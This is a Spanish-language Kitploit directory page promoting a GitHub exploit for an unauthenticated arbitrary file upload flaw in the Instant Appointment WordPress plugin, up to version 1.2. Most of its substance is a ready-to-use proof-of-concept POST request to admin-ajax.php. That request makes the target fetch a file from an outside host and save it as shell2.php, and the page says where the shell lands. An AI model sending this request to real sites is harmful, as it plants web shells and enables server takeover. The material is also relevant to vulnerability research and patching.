Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
instant-appointment-arbitrary-file-upload — instant-appointment - Arbitrary File upload | Kitploit
Herramientas/GitHubGitHub/randomrobbiebf/instant-appointment-arbitrary-file-upload
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubrandomrobbiebf/instant-appointment-arbitrary-file-upload

instant-appointment-arbitrary-file-upload

instant-appointment - Arbitrary File upload

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 1 añoAún no revisado

instant-appointment-arbitrary-file-upload

instant-appointment - Subida arbitraria de archivos

Descripción

El plugin Instant Appointment para WordPress es vulnerable a la subida arbitraria de archivos en versiones hasta la 1.2, inclusive. Esto permite que atacantes no autenticados suban un shell y ejecuten comandos.

Detalles

  • Tipo: plugin
  • Slug: instant-appointment
  • Versión afectada: 1.2
  • Puntuación CVSS: 9.8
  • Calificación CVSS: Alta
  • Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE:
  • Estado: Cerrado

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wp-dev.ddev.site
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Content-Length: 108

action=add_gallery_to_vendor&user_galerie[0][1]=https://rfi.nessus.org/rfi.txt&user_galerie[0][0]=shell2.php

El archivo estará en uploads/2025/1/shell2.php.

Descargar herramienta